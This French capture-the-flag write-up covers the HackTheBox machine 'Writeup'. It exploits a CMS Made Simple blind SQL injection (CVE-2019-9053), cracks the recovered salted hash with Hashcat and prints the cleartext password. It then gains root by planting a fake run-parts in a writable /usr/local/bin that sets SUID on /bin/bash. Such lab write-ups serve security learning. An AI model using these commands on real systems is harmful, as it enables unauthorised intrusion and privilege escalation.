CMS Made Simple vulnérable à une SQLi aveugle (CVE-2019-9053). Hash salé cracké avec Hashcat. Escalade via PATH hijacking sur le groupe staff.
Le fichier robots.txt révèle le répertoire /writeup/. Le code source de la page contient le générateur : CMS Made Simple ≤ 2019.
python cve.py -u http://10.10.10.138/writeup/ --crack -w best110.txt
# → Username: jkr | Hash: 62def4866937f08cc13bab43bb14e6f7 | Salt: 5a599ef579066807Hash md5($salt.$pass) cracké avec Hashcat mode 20.
echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash.txt
hashcat -m 20 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# → jkr:raykayjay9groups jkr → membre du groupe staff (droits d'écriture dans /usr/local/bin).pspy observe qu'à chaque connexion SSH, root exécute run-parts via un PATH commençant par /usr/local/bin.
Le groupe staff peut écrire dans /usr/local/bin, on y place un faux run-parts qui définit le SUID bit sur /bin/bash.
echo -e '#!/bin/bash
chmod u+s /bin/bash' > /usr/local/bin/run-parts
chmod +x /usr/local/bin/run-parts
# Reconnecter SSH → root exécute notre script
/bin/bash -p # euid=0(root)La leçon de cette machine : surveiller les processus avec pspy est souvent plus révélateur qu'un scan statique. Le PATH hijacking fonctionne parce que root fait confiance à un répertoire accessible en écriture, une subtilité que les scanners automatiques ratent facilement.